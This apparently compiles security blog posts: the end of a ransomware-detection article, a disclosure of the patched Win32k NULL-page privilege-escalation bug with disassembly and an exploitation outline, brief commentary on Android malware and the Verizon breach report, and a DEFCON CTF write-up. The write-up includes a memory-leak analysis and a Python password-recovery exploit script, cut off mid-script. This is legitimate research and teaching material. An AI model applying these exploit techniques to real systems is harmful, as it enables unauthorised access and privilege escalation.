Entropy is not the be-all, end-all measurement that can affirm whether or not a file contains encrypted content, but it provides a very useful window through which we can gather further evidence of processes that may be modifying files in an abnormal manner.

Additional Screening

Each file operation will be subjected to further proprietary anomaly screening beyond filepath and entropy analysis, which results in modifications to the file anomaly score. The additional data that is yielded, when combined with the results of filepath and entropy analysis, provides an extensive overview of a given file operation and allows for immediate detection of anomalous behavior. Various approaches were tested and integrated into our scoring throughout our research, leading to the scoring system in the product today.

Analysis underway...

How It All Comes Together

As each file operation passes through our ransomware-detecting Rube Goldberg machine, all necessary data associated with the affected file will be extracted and analyzed, and a minimal amount of data summarizing the operation is maintained for posterity. The file's anomaly score will then be logged and added to the process anomaly score.

Artistic Representation of Detection Algorithm

In the event that the process anomaly score meets or exceeds a predetermined threshold, the process will be suspended immediately. A pop-up dialog will alert the user to the suspended ransomware activity and provide them with the option to terminate or resume the offending process.
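The accumulate-then-threshold flow can be sketched roughly as below. The class name, the threshold value, and the `record` method are hypothetical; the real scoring and suspension logic is proprietary and more involved.

```python
from collections import defaultdict

SUSPEND_THRESHOLD = 10.0  # hypothetical threshold, for illustration only


class ProcessScoreboard:
    """Toy per-process accumulator of file anomaly scores."""

    def __init__(self, threshold: float = SUSPEND_THRESHOLD):
        self.threshold = threshold
        self.scores = defaultdict(float)
        self.suspended = set()

    def record(self, pid: int, file_score: float) -> bool:
        """Add one file operation's score; return True if pid is suspended."""
        if pid in self.suspended:
            return True
        self.scores[pid] += file_score
        if self.scores[pid] >= self.threshold:
            # A real sensor would suspend the process and alert the user here.
            self.suspended.add(pid)
            return True
        return False


board = ProcessScoreboard()
results = [board.record(4242, score) for score in (4.0, 4.0, 2.0)]
print(results)
```

In this sketch the third operation brings the hypothetical process 4242 to the threshold, which is the point at which the user would be prompted to terminate or resume it.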

Ransomware Protection Popup Dialog

Since our ransomware protection feature is driven by analyzing file operations at a high level, it will work irrespective of the type of process. Whether the process originates from a .NET binary, fileless malware (Powershell, JavaScript, VBScript), or a standard executable, Endgame ransomware protection will be able to track all operations needed to quickly determine whether anomalous activity has occurred on a system. Our solution does not interfere with normal system and application operation and introduces minimal CPU and memory overhead. We also handle all of this with a very low false positive rate. Earlier variants of our scoring algorithm sometimes experienced false positives with software compilation, filesystem cleanup utilities, and other applications which create or destroy a very large number of files in a short period of time. A large amount of tuning was required to maintain a very low FP rate for customers.

Case Study: WannaCry

When WannaCry began grabbing headlines earlier in May, as we detailed, our research team immediately obtained the dropper and the core encryptor binary (tasksche.exe) in order to perform offline testing against our ransomware protection feature. The embedded video below walks through launching the encryptor on a virtual machine with ransomware protection enabled.

Endgame Ransomware Protection at Work

Endgame ransomware protection detects ransomware activity on the machine shortly after the encryptor launches, before thousands or even hundreds of files can be encrypted. The speed with which the ransomware is detected and mitigated protects against critical data loss, expediting the return to business as usual. An alert containing detailed process activity data is also generated and sent back to the Endgame sensor management platform, allowing for further triage of the ransomware and the workflow which resulted in it being invoked on the system. In addition to MalwareScore™, Endgame ransomware protection serves as another line of defense against extensive critical data loss caused by ransomware such as WannaCry.

Conclusion

As long as ransomware remains a profitable criminal venture, attackers will continue to pursue new means to compromise networks and deploy ransomware. Just like other forms of malware, ransomware can be stopped at various points along the attack chain. However, given the customization of techniques and the persistence of targeted attackers, it is essential to be able to provide an additional line of defense. Endgame’s ransomware protection provides this, integrating detection techniques based on filepaths, entropy, and our own proprietary algorithms to protect against the broad range of ransomware in the wild today. As the WannaCry example demonstrates, our ransomware protection is effective at stopping not only well-known but also emergent strains of ransomware.

↧

Microsoft Win32k NULL Page Vulnerability Technical Analysis

October 9, 2013, 11:30 am

Endgame has discovered and disclosed to Microsoft the Win32k NULL Page Vulnerability (CVE-2013-3881), which has been fixed in Microsoft’s October Security Bulletin, released October 8, 2013. The vulnerability was the result of insufficient pointer validation in a kernel function that handles popup menus. Successfully exploiting this vulnerability would allow an attacker with unprivileged access to a Windows 7 or Server 2008 R2 system to gain access to the Windows kernel, thereby rendering user account controls useless.

Affected Versions

In previous versions of Windows, including XP, Server 2003, Vista, and Server 2008 R1, Microsoft actually included code that adequately verified the pointer in question. However, in Windows 7 (and Server 2008 R2), that check was removed, leading to the exploitable condition.

If the product line ended there, it would be easy to imagine that this was an inadvertent removal of what a developer mistakenly thought was a redundant check and to give it little additional thought. However, in the initial release of Windows 8 (August 2012), the pointer validation had been put back in place, long before we reported the bug to Microsoft. We would assume that when a significant security issue comes to light, Microsoft would simultaneously fix it across all affected products. Unless the Windows 8 win32k.sys code was forked from a pre-Windows 7 base, this bug was fixed upstream by Microsoft prior to our disclosure. This is purely speculative, but if our previous supposition is true, they either inadvertently fixed the bug, or recognized the bug and purposely fixed it, but failed to understand the security problem it created.

Mitigation

The good news for Windows users is that Microsoft does have a realistic approach to dealing with vulnerabilities, which resulted in some protection even prior to the release of this patch. One of the simplest security features (at least in concept, if not in implementation) that Microsoft introduced in Windows 8 was to prohibit user applications from mapping memory at virtual address zero. This technique takes the entire class of null-pointer-dereference kernel bugs out of the potential-system-compromise category and moves them into the relatively benign category of user-experience/denial-of-service problems. When Microsoft back-ported this protection to Windows 7, they eliminated the opportunity to exploit this bug on 64-bit systems. This illustrates how the conventional wisdom that “an ounce of prevention is worth a pound of cure” can be turned on its ear in the world of software vulnerabilities. Microsoft will undoubtedly be fixing null pointer dereferences in their products for as long as they support them. However, by applying a relatively inexpensive “cure”, they have limited the consequences of the problems that they will spend years trying to “prevent”.

Impact

Part of what makes this type of vulnerability so valuable to attackers is the proliferation of sandbox technologies in popular client-side applications. We have confirmed that this vulnerability can be exploited from within several client-side applications’ sandboxes, including Google Chrome and Adobe Reader, and from Internet Explorer’s protected mode. On the surface, that sounds like bad news. On the other hand, we would not have even considered that question if these mitigation technologies were not making it more difficult for attackers to compromise systems. In order to completely own a target via one of those applications, an attacker must have a vulnerability that leads to code execution, another that allows them to leak memory so as to defeat Microsoft’s memory randomization feature, and finally, a vulnerability like the one described here that allows them to escape the hobbled process belonging to the initial target application.

Technical Details

When an application displays a popup or context menu, it must call user32!TrackPopupMenu or user32!TrackPopupMenuEx in order to capture the action that the user takes relative to that menu. This function eventually leads to the xxxTrackPopupMenuEx function in win32k.sys. Since it is unusual to simultaneously display multiple context menus, there is a global MenuState object within win32k.sys that is ordinarily used to track the menu. However, since it is possible to display multiple context menus, if the global MenuState object is in use, xxxTrackPopupMenuEx attempts to create another MenuState object with a call to xxxMNAllocMenuState. xxxTrackPopupMenuEx saves the result of this allocation attempt and checks to ensure that the result was not 0, as seen in the most recent unpatched 64-bit Windows 7 version of win32k.sys (6.1.7601.18233):

xxxTrackPopupMenuEx+364 call xxxMNAllocMenuState
xxxTrackPopupMenuEx+369 mov r15, rax
xxxTrackPopupMenuEx+36C test rax, rax
xxxTrackPopupMenuEx+36F jnz short alloc_success
xxxTrackPopupMenuEx+371 bts esi, 7
xxxTrackPopupMenuEx+375 jmp clean_up

In the event that the allocation fails, the function skips to its cleanup routine. Because r15 now holds the null result of the failed allocation, the cleanup code's access to [r15+8] dereferences address 0x8, which under normal circumstances is unmapped and causes a BSOD:

xxxTrackPopupMenuEx+9BA clean_up: ; CODE XREF: xxxTrackPopupMenuEx+375j
xxxTrackPopupMenuEx+9BA bt dword ptr [r15+8], 8

However, if we can allocate and correctly initialize the memory mapped at address zero for the process, we can reliably gain arbitrary code execution when the function passes the invalid MenuState pointer to xxxMNEndMenuState.

xxxTrackPopupMenuEx+A76 mov rcx, r15 ;pMenuState
xxxTrackPopupMenuEx+A79 call xxxMNEndMenuState

It is possible to reliably create circumstances in which the xxxTrackPopupMenuEx call to xxxMNAllocMenuState will fail. After creating two windows, we use repeated calls to NtGdiCreateClientObj in order to reach the maximum number of handles that the process is allowed to have open. Once we have exhausted the available handles, we attempt to display a popup menu in each of the two previously created windows. Since the global MenuState object is not available for the second window’s menu, xxxTrackPopupMenuEx calls xxxMNAllocMenuState in order to create a new MenuState object. Because there are no available handles due to our previous exhaustion, this call fails and xxxMNEndMenuState is called with a parameter of 0, instead of a valid pointer to a MenuState object.

↧

Android Is Still the King of Mobile Malware

May 7, 2014, 11:30 am

According to F-Secure’s “Q1 2014 Mobile Threat Report”, the Android operating system was the main target of 99% of new mobile malware in Q1 2014. The report states that between January 1 and March 31, F-Secure discovered 275 new malware threat families for Android, compared to just one for iOS and one for Symbian. In the same report from Q1 2013, F-Secure identified 149 malware threat families with 91% of them targeting Android. Not only are malware threats proliferating, but the amount of malware specifically targeting Android devices is also increasing.

It’s true that Android malware is becoming more advanced and harder to mitigate. But all the same, the numbers tell a bleak story for Android users. Why are there so many more malware threat families for Android than for iOS? The advantage iOS has over Android in terms of malware protection is Apple’s App Store, where all applications are vetted and tested before public release. This system has had a significant impact on preventing malware infections for iOS users. Since a large number of Android apps come from third-party sources, it’s more difficult for Google to monitor and control all of the Android apps being downloaded by consumers. As long as Android continues to allow users to download apps from third parties where “criminal developers” can distribute their applications, we’re likely to continue to see an increase in the number of Android malware threats. It will be interesting to see what F-Secure’s Q2 report brings.

↧

Verizon's Data Breach Investigations Report: POS Intrusion Discovery

May 11, 2014, 11:30 am

Verizon recently released its 2014 Data Breach Investigations Report. I could spend all day analyzing this, but I’ll touch on just one issue that’s been on many of our minds recently: Point-of-Sale (POS) intrusion.

Aside from Verizon’s assertion that the number of POS intrusions is actually declining (contrary to popular perception), I was most intrigued by the following statement: “Regardless of how large the victim organization was or which methods were used to steal payment card information, there is another commonality shared in 99% of the cases: someone else told the victim they had suffered a breach.”

What does that say for the wide array of network defense software currently deployed around the globe? An organization’s security posture is clearly flawed if the vast majority of compromises are discovered by outside parties (the report stated that law enforcement was the leading source of discovery for POS intrusions). It is especially troubling that even large organizations don’t spot intrusions, because they likely have the resources to purchase the best security tools available. Either companies aren’t prioritizing security, or the available tools are failing them.

The bottom line is that with all the network security tools out there, no one has shown much success at thwarting POS attacks in real time. If we assume the POS targets were PCI compliant, then they must have met, at a minimum, the 12 security requirements grouped under 6 control objectives (per the PCI Data Security Standard: Requirements and Security Assessment Procedures Version 3.0).

Despite these security measures being critical first lines of defense, in many situations they are not enough to thwart the most aggressive threats. Attackers were still able to enter the networks and extract sensitive consumer information. It seems likely that network defenders will continue to be unaware of nefarious acts taking place within their own networks until more intelligent network security solutions become the standard. Detection, analysis, and remediation need to happen in real time, rather than continuing to be a post-mortem affair.

↧

DEFCON Capture the Flag Qualification Challenge #1

May 20, 2014, 11:30 am

I constantly challenge myself to gain deeper knowledge in reverse engineering, vulnerability discovery, and exploit mitigations. By day, I channel this knowledge and passion into my job as a security researcher at Endgame. By night, I use these skills as a Capture the Flag code warrior. I partook in the DEFCON CTF qualification round this weekend to help sharpen these skills and keep up with the rapid changes in reverse engineering technology. DEFCON CTF qualifications are a fun, and sometimes frustrating, way to cultivate my skillset by solving challenges alongside my team, Samurai.

CTF Background

For those of you who aren’t familiar with a computer security CTF game, Wikipedia provides a simple explanation. The qualification round for the DEFCON CTF is run jeopardy style, while the actual game is an attack/defense model. Qualifications ran all weekend for 48 hours with no breaks. Since 2013 the contest has been run by volunteers belonging to a hacker club called the Legitimate Business Syndicate, which is made up in part of former Samurai members. They did a fantastic job with qualifications this year and ran a smooth game with almost no downtime, solid technical challenges, round-the-clock support, and the obligatory good-natured heckling. As a fun exercise, let’s walk through an interesting problem from the game. All of the problems from the CTF game can be found here.

Problem Introduction

The first challenge was written by someone we’ll call Mr. G and was worth 2 points. Upon opening the challenge you are presented with the following text:

http://services.2014.shallweplayaga.me/shitsco_c8b1aa31679e945ee64bde1bdb19d035 is running at:

shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me:31337

Capture the flag.

Downloading the shitsco_c8b1aa31679e945ee64bde1bdb19d035 file and running the “file” command reveals:

user@ubuntu:~$  file shitsco

shitsco: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x8657c9bdf925b4864b09ce277be0f4d52dae33a6, stripped

This is an ELF file that we can assume will run on a Linux 32-bit OS. Symbols were stripped to make reverse engineering a bit more difficult. At least it is not statically linked. I generally like to run strings on a binary at this point to get a quick sense of what might be happening in the binary. Doing this shows several string APIs imported and text that looks to be indicative of a command prompt style interface. Let’s run the binary to confirm this:

user@ubuntu:~$  ./shitsco
Failed to open password file: No such file or directory

Ok, the program did not do what I expected. We will need to add a user shitsco and create a file in his home directory called password. I determined this by running:

shitsco@ubuntu:~$  sudo strace ./shitsco
…
open("/home/shitsco/password", O_RDONLY) = -1 ENOENT (No such file or directory)
…

We can see that the file /home/shitsco/password was opened for reading and that this failed (ENOENT) because the file did not exist. You should create this file without a new line on the end or you might have trouble later on. I discovered this through trial and error. After creating the file we get better results:

shitsco@ubuntu:~$  echo -n asdf > /home/shitsco/password
shitsco@ubuntu:~$  ./shitsco

  oooooooo8 oooo        o88    o8
888         888ooooo   oooo o888oo  oooooooo8    ooooooo     ooooooo
 888oooooo  888   888   888  888   888ooooooo  888     888 888     888
        888 888   888   888  888           888 888         888     888
o88oooo888 o888o o888o o888o  888o 88oooooo88    88ooo888    88ooo88

Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?

$ ?
==========Available Commands==========
|enable                               |
|ping                                 |
|tracert                              |
|?                                    |
|shell                                |
|set                                  |
|show                                 |
|credits                              |
|quit                                 |
======================================
Type ? followed by a command for more detailed information
$

This looks like fun. We have what looks to be a router prompt. Typically, the goal with these binary exploitation problems is to identify somewhere that user input causes the program to crash and then devise a way to make that input take control over the program and reveal a file called flag residing on the remote machine. At this point, I have two choices. I can play around with the input to see if I can get it to crash or I can dive into the reverse engineering. I opted to play around with the input and the first thing that caught my attention was the shell command!

Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?
$ shell
bash-3.2$

No way, it couldn’t be that easy. Waiting 5 seconds produces:

Yeah, right.

Ok, let the taunting begin. We can ignore the shell command. Thanks for the laugh Mr. G. By playing with the command line interface, I found the command input length was limited to 80 characters with anything coming after 80 characters applying to the next command. The set and show commands looked interesting, but even adding 1000 variables of different lengths failed to produce any interesting behavior. Typically, I am looking for a way to crash the program at this point.

What really looked like the solution came from the enable command:

$ enable
Please enter a password: asdf
Authentication Successful
# ?
==========Available Commands==========
|enable                               |
|ping                                 |
|tracert                              |
|?                                    |
|flag                                 |
|shell                                |
|set                                  |
|show                                 |
|credits                              |
|quit                                 |
|disable                              |
======================================
Type ? followed by a command for more detailed information
# flag
The flag is: foobarbaz

The password for the enable prompt comes from the password file we created earlier. I also created a file in /home/shitsco/ called flag with the contents foobarbaz, which is now happily displayed on my console. The help output (the ? command) in “enabled mode” lists two extra commands: disable and flag. So, if I can get the enable password on the remote machine, then I can simply run the flag command and score points on the problem. Ok, we have a plan, but how to crack that password?

The “Enable” Password

To recover this password, the first option that comes to mind is brute force. This is usually an option of last resort in CTF competitions. Just think about what could happen to this poor service if 1000 people decided to brute force the challenge. Having an inaccessible service spoils the fun for others playing. It’s time to dive a bit deeper and see if there is anything else we could try.

I tried long passwords, passwords with format strings such as %s, empty passwords, and passwords with binary data. None of these produced any results. However, a password length of 5 caused a strange behavior:

$ enable
Please enter a password: AAAAA
Nope.  The password isn't AAAAA▒r▒@▒r▒▒ο`M_▒`▒▒▒t▒

Ok, that looks like we’re getting extra memory back. If we look at it as hex we see:

shitsco@ubuntu:~$  echo -e enable\\nAAAAA\\n | ./shitsco | xxd
…
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2041 4141 4141 f07c b740 f47c  sn't AAAAA.|.@.|
0000240: b792 90c1 bf60 c204 0808 8d69 b760 c204  .....`.....i.`..
0000250: 08a0 297f b701 0a24 200a 3a20 496e 7661  ..)....$ .: Inva
0000260: 6c69 6420 636f 6d6d 616e 640a 2420       lid command.$

The bit that starts 0xf0 0x7c is the start of the memory disclosure. Looking a little further, we see 0x60 0xc2 0x04 0x08. This looks like it could be a little endian encoded pointer for 0x0804c260. This is pretty cool and all, but where is the password?
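To double-check the pointer guess, the leaked bytes from the hex dump above can be decoded as little-endian 32-bit values. This is a minimal sketch; the helper name `aligned_dwords` is my own, and it assumes the password buffer starts on a 4-byte boundary, so the leak is read as dwords starting 3 bytes after the five A characters.

```python
import struct

# Leaked bytes copied from the xxd output, starting right after "AAAAA".
leak = bytes.fromhex(
    "f07cb7 40f47cb7 9290c1bf 60c20408 088d69b7 60c20408 a0297fb7"
)


def aligned_dwords(leaked: bytes, prefix_len: int):
    """Decode the leak as little-endian dwords aligned to the buffer start.

    prefix_len is the number of bytes we typed before the leak begins.
    Assumes the buffer itself is 4-byte aligned.
    """
    pad = -prefix_len % 4                    # bytes needed to reach alignment
    body = leaked[pad:]
    body = body[: len(body) - len(body) % 4]  # drop any trailing partial dword
    return [value for (value,) in struct.iter_unpack("<I", body)]


for value in aligned_dwords(leak, prefix_len=5):
    print(hex(value))
```

Under that alignment assumption, the third and fifth values both decode to 0x0804c260, matching the pointer spotted by eye, and the remaining values look like stack and library addresses.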

I tried sending passwords of every possible length, and the service always leaked the same amount of data. However, the leak only worked when the password was longer than 4 characters. It’s time to turn to IDA Pro and focus on the function for the enable command.

This is the disassembly for the function responsible for handling the enable command. It is easy to find with string cross references:

.text:08049230 enable          proc near               ; DATA XREF: .data:0804C270o
.text:08049230
.text:08049230 dest            = dword ptr -4Ch
.text:08049230 src             = dword ptr -48h
.text:08049230 n               = dword ptr -44h
.text:08049230 term            = byte ptr -40h
.text:08049230 s2              = byte ptr -34h
.text:08049230 var_14          = dword ptr -14h
.text:08049230 cookie          = dword ptr -10h
.text:08049230 arg_0           = dword ptr  4
.text:08049230
.text:08049230                 push    esi
.text:08049231                 push    ebx
.text:08049232                 sub     esp, 44h
.text:08049235                 mov     esi, [esp+4Ch+arg_0]
.text:08049239                 mov     eax, large gs:14h
.text:0804923F                 mov     [esp+4Ch+cookie], eax
.text:08049243                 xor     eax, eax
.text:08049245                 mov     eax, [esi]
.text:08049247                 test    eax, eax
.text:08049249                 jz      loc_80492D8
.text:0804924F                 lea     ebx, [esp+4Ch+s2]
.text:08049253                 mov     [esp+4Ch+n], 20h ; n
.text:0804925B                 mov     [esp+4Ch+src], eax ; src
.text:0804925F                 mov     [esp+4Ch+dest], ebx ; dest
.text:08049262                 call    _strncpy
.text:08049267
.text:08049267 loc_8049267:                            ; CODE XREF: enable+EDj
.text:08049267                 mov     [esp+4Ch+src], ebx ; s2
.text:0804926B                 mov     [esp+4Ch+dest], offset password_mem ; s1
.text:08049272                 call    _strcmp
.text:08049277                 mov     [esp+4Ch+var_14], eax
.text:0804927B                 mov     eax, [esp+4Ch+var_14]
.text:0804927F                 test    eax, eax
.text:08049281                 jz      short loc_80492B8
.text:08049283                 mov     [esp+4Ch+n], ebx
.text:08049287                 mov     [esp+4Ch+src], offset aNope_ThePasswo ; "Nope.  The password isn't %s\n"
.text:0804928F                 mov     [esp+4Ch+dest], 1
.text:08049296                 call    ___printf_chk
.text:0804929B
.text:0804929B loc_804929B:                            ; CODE XREF: enable+A5j
.text:0804929B                 mov     [esp+4Ch+dest], esi
.text:0804929E                 call    sub_8049090
.text:080492A3                 mov     eax, [esp+4Ch+cookie]
.text:080492A7                 xor     eax, large gs:14h
.text:080492AE                 jnz     short loc_8049322
.text:080492B0                 add     esp, 44h
.text:080492B3                 pop     ebx
.text:080492B4                 pop     esi
.text:080492B5                 retn
.text:080492B5 ; ---------------------------------------------------------------------------
.text:080492B6                 align 4
.text:080492B8
.text:080492B8 loc_80492B8:                            ; CODE XREF: enable+51j
.text:080492B8                 mov     [esp+4Ch+dest], offset aAuthentication ; "Authentication Successful"
.text:080492BF                 mov     ds:admin_privs, 1
.text:080492C9                 mov     ds:prompt, 23h
.text:080492D0                 call    _puts
.text:080492D5                 jmp     short loc_804929B
.text:080492D5 ; ---------------------------------------------------------------------------
.text:080492D7                 align 4
.text:080492D8
.text:080492D8 loc_80492D8:                            ; CODE XREF: enable+19j
.text:080492D8                 mov     [esp+4Ch+src], offset aPleaseEnterAPa ; "Please enter a password: "
.text:080492E0                 lea     ebx, [esp+4Ch+s2]
.text:080492E4                 mov     [esp+4Ch+dest], 1
.text:080492EB                 call    ___printf_chk
.text:080492F0                 mov     eax, ds:stdout
.text:080492F5                 mov     [esp+4Ch+dest], eax ; stream
.text:080492F8                 call    _fflush
.text:080492FD                 mov     dword ptr [esp+4Ch+term], 0Ah ; term
.text:08049305                 mov     [esp+4Ch+n], 20h ; a3
.text:0804930D                 mov     [esp+4Ch+src], ebx ; a2
.text:08049311                 mov     [esp+4Ch+dest], 0 ; fd
.text:08049318                 call    read_n_until
.text:0804931D                 jmp     loc_8049267
.text:08049322 ; ---------------------------------------------------------------------------
.text:08049322
.text:08049322 loc_8049322:                            ; CODE XREF: enable+7Ej
.text:08049322                 call    ___stack_chk_fail
.text:08049322 enable          endp

Here is the C decompiled version of the function that is a bit clearer:

int __cdecl enable(const char **a1)
{
  const char *v1; // ebx@2
  char s2[32]; // [sp+18h] [bp-34h]@2
  int v4; // [sp+38h] [bp-14h]@3
  int cookie[4]; // [sp+3Ch] [bp-10h]@1

  cookie[0] = *MK_FP(__GS__, 20);
  if ( *a1 )
  {
   v1 = s2;
   strncpy(s2, *a1, 32u);
  }
  else
  {
   v1 = s2;
   __printf_chk(1, "Please enter a password: ");
   fflush(stdout);
   read_n_until(0, (int)s2, 32, 10);
  }
  v4 = strcmp((const char *)password_mem, v1);
  if ( v4 )
  {
   __printf_chk(1, "Nope.  The password isn't %s\n", v1);
  }
  else
  {
   admin_privs = 1;
   prompt = '#';
   puts("Authentication Successful");
  }
  sub_8049090((void **)a1);
  return *MK_FP(__GS__, 20) ^ cookie[0];
}

I’ve labeled a few things here, such as the local variables and the read_n_until function. Notice that s2 (whose address is loaded into ebx and passed in the [esp+4Ch+src] argument slot) is the destination buffer for the password we enter. It also looks possible to run enable <password> and not get prompted for the password at all. That path copies the argument with strncpy, while the prompting path reads the password with a call to read_n_until. Here is the interesting thing: when I tried the strncpy code path, I did not get the leak behavior:

$ enable
Please enter a password: AAAAA
Nope.  The password isn't AAAAA`x▒@dx▒▒▒`▒d▒`▒▒▒z▒
$ enable AAAAA
Nope.  The password isn't AAAAA
$

So, what is the difference? Let’s have a quick look at the strncpy man page, namely the bit that says “If the length of src is less than n, strncpy() writes additional null bytes to dest to ensure that a total of n bytes are written.” On the prompting code path, our string is not being null terminated but if we enter the password with the enable command it is null terminated. We can also see that the s2 variable on the stack is never initialized to 0. There is no memset call.
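To make the difference between the two paths concrete, here is a small Python simulation. It is only a sketch: the stale stack bytes are made up, and c_strncpy, raw_read and c_string_at are hypothetical helpers that imitate the C behavior described above, not code from the binary.

```python
def c_strncpy(dest: bytearray, src: bytes, n: int) -> None:
    """Imitate C strncpy: copy up to n bytes, then pad the rest of n with NULs."""
    src = src.split(b"\x00", 1)[0]          # a C string stops at its first NUL
    copied = src[:n]
    dest[:n] = copied + b"\x00" * (n - len(copied))


def raw_read(dest: bytearray, data: bytes, n: int) -> None:
    """Imitate a read loop that stores the bytes but never appends a NUL."""
    copied = data[:n]
    dest[:len(copied)] = copied


def c_string_at(buf: bytes) -> bytes:
    """What printf("%s") would print: everything up to the first NUL."""
    return bytes(buf).split(b"\x00", 1)[0]


# Made-up stale stack contents: a NUL at index 3 and junk after it.
stale = bytearray(b"\x60\x78\x92\x00" + b"\x64\x78\x92\xbf" * 7)

via_strncpy = bytearray(stale)
c_strncpy(via_strncpy, b"AAAAA", 32)        # the "enable AAAAA" path

via_read = bytearray(stale)
raw_read(via_read, b"AAAAA", 32)            # the prompting path

print(c_string_at(via_strncpy))             # just the five A's
print(c_string_at(via_read))                # five A's followed by stale bytes
```

The padding done by strncpy wipes the whole 32-byte buffer, while the raw read only overwrites the bytes we typed, including the NUL that used to end the string early.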

Still we don’t have the password. It doesn’t exist in the leaked data. Leaks are very useful in exploitation as a defeat to ASLR. We might have enough information here to recover base addresses of the stack or libc. However, the path we are on to get the flag does not involve taking advantage of memory corruption. Is there anything in this leak that could give us something useful?

To answer this question let’s look at the stack layout and what is actually getting printed back to us:

.text:08049230 dest            = dword ptr -4Ch
.text:08049230 src             = dword ptr -48h
.text:08049230 n               = dword ptr -44h
.text:08049230 term            = byte ptr -40h
.text:08049230 s2              = byte ptr -34h
.text:08049230 var_14          = dword ptr -14h
.text:08049230 cookie          = dword ptr -10h
.text:08049230 arg_0           = dword ptr  4

Therefore, if we are copying into s2 and we only leak data after the 4th character, we can assume that by default in the uninitialized stack there is a null at s2[3]. Overwriting this with user data causes our string to not terminate until we run into a null later on up the stack. What is var_14?

v4 = strcmp((const char *)password_mem, v1);

It turns out that var_14 (or v4) is the return value from strcmp. Hmm. Here is what the man page has to say about that: “The strcmp() and strncmp() functions return an integer less than, equal to, or greater than zero if s1 (or the first n bytes thereof) is found, respectively, to be less than, to match, or be greater than s2.” What this means is that we can tell whether our input string is less than or greater than the password on the remote machine. Let’s try it locally first. Our password locally is “asdf”. Let’s see if we can divine the first character using this method. Since s2 sits at -34h and var_14 at -14h, var_14 begins exactly 32 bytes after the start of s2, so it should be the 33rd character we get back:

shitsco@ubuntu:~$  python -c "import sys;sys.stdout.write('enable\n' + ' '*80 + '\n')" | ./shitsco |xxd
…
0000210: 2070 6173 7377 6f72 643a 204e 6f70 652e   password: Nope.
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2020 2020 2020 2020 2020 2020  sn't
0000240: 2020 2020 2020 2020 2020 2020 2020 2020
0000250: 2020 2020 2001 0a24 200a 2020 2020 2020       ..$ .

I picked the space character for our password because space (0x20) is the lowest-valued printable character in the ASCII table. The 01 byte at offset 0x255 in the dump, immediately after the run of spaces, is the low byte of var_14, so var_14 was 0x1. The null after the 0x1 is implied, since it is what ends the printed string. Now, what happens if we set this to ‘a’ + 79 spaces?

shitsco@ubuntu:~$ python -c "import sys;sys.stdout.write('enable\na' + ' '*79 + '\n')" | ./shitsco |xxd
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2061 2020 2020 2020 2020 2020  sn't a
0000240: 2020 2020 2020 2020 2020 2020 2020 2020
0000250: 2020 2020 2001 0a24 200a 2020 2020 2020       ..$ .
0000260: 2020 2020 2020 2020 2020 2020 2020 2020

Remember, that ‘a’ was actually the first character of our password locally and we still got a 0x1 back. How about ‘b’?

shitsco@ubuntu:~$ python -c "import sys;sys.stdout.write('enable\nb' + ' '*79 + '\n')" | ./shitsco |xxd
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2062 2020 2020 2020 2020 2020  sn't b
0000240: 2020 2020 2020 2020 2020 2020 2020 2020
0000250: 2020 2020 20ff ffff ff0a 2420 0a20 2020       .....$ .
0000260: 2020 2020 2020 2020 2020 2020 2020 2020

Bingo. Here we have a value of 0xffffffff for var_14. Therefore, we know that the string we sent in is numerically higher than the actual password. The last character we tried, ‘a’, was still giving us back 0x01. When we see the value of var_14 change to -1 we know that the correct character was not the most recent attempt but the one prior to it. We can send all characters sequentially until we find the password.
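Before pointing anything at a real service, the idea can be tried against a purely local stand-in. The sketch below is not the exploit itself: strcmp_sign, make_oracle and recover are hypothetical names, the oracle simply returns the sign of strcmp(password, guess), and I assume the password consists only of printable, non-space ASCII characters.

```python
def strcmp_sign(s1: bytes, s2: bytes) -> int:
    """Sign of C strcmp(s1, s2): -1, 0 or 1, comparing up to the first NUL."""
    a = s1.split(b"\x00", 1)[0]
    b = s2.split(b"\x00", 1)[0]
    return (a > b) - (a < b)


def make_oracle(secret: bytes):
    """Local stand-in for the leaked var_14 value."""
    return lambda guess: strcmp_sign(secret, guess)


def recover(oracle, max_len: int = 30) -> bytes:
    # Candidates in ascending byte order, skipping space (used as padding).
    alphabet = [bytes([c]) for c in range(0x21, 0x7f)]
    known = b""
    while len(known) < max_len:
        chosen = alphabet[-1]               # used if the sign never flips
        for prev, cur in zip(alphabet, alphabet[1:]):
            pad = b" " * (max_len - len(known) - 1)
            if oracle(known + cur + pad) < 0:
                # The guess now sorts after the password. Either cur is the
                # final character (the padding caused the flip) or prev was
                # the right character for this position.
                if oracle(known + cur) == 0:
                    return known + cur
                chosen = prev
                break
        known += chosen
        if oracle(known) == 0:
            return known
    return known


print(recover(make_oracle(b"asdf")))
```

Each position costs at most one pass over the alphabet, so the number of guesses grows linearly with the password length instead of exponentially.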

Automation

The password used on the remote server is probably short enough that we could disclose it by hand. However, as a general rule in life, if I have to do something more than a few times I almost always save time by writing a quick python script to automate. Since we are going to be running this on a remote target I’ve set the server to run over a TCP port with some fancy piping over a fifo pipe.

shitsco@ubuntu:~$ mkfifo pipe
shitsco@ubuntu:~$ nc -l 31337 < pipe | ./shitsco > pipe

Here is a python script that will discover the password used. I’ve changed the password file on my local system to the one that was used during the game:

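# Python 2 script: recovers the enable password one character at a time
# using the strcmp() result that leaks after the password buffer.
import socket
import string
import sys

s=socket.socket()

s.connect(("192.168.1.151", 31337))
s.recv(1024)  # discard whatever the server sends on connect

def try_pass(passwd):
    s.send("enable\n")
    s.recv(1024)  # discard the password prompt
    s.send(passwd + "\n")
    ret = s.recv(1024)
    if ret.find("Authentication Successful") != -1:
        return "!"
    # The leaked var_14 byte sits two characters before the next "$" prompt
    return ret[ret.find("$")-2]

chars = []
for x in string.printable:
    chars.append(x)
chars.sort()

known = ""
while 1:
    prev = chars[0]
    for x in chars:

        # Pad with spaces so the printed string runs on into var_14
        i = try_pass(known + x + " " * (30-len(known)))
        if ord(i) == 0xff:
            # Sign flipped to -1: the previous candidate was the right one
            known += prev
            break
        prev = x

    # The flip also happens on the final character, so try x as an exact match
    i = try_pass(known[:-1]+x+"\x00")
    if i == '!':
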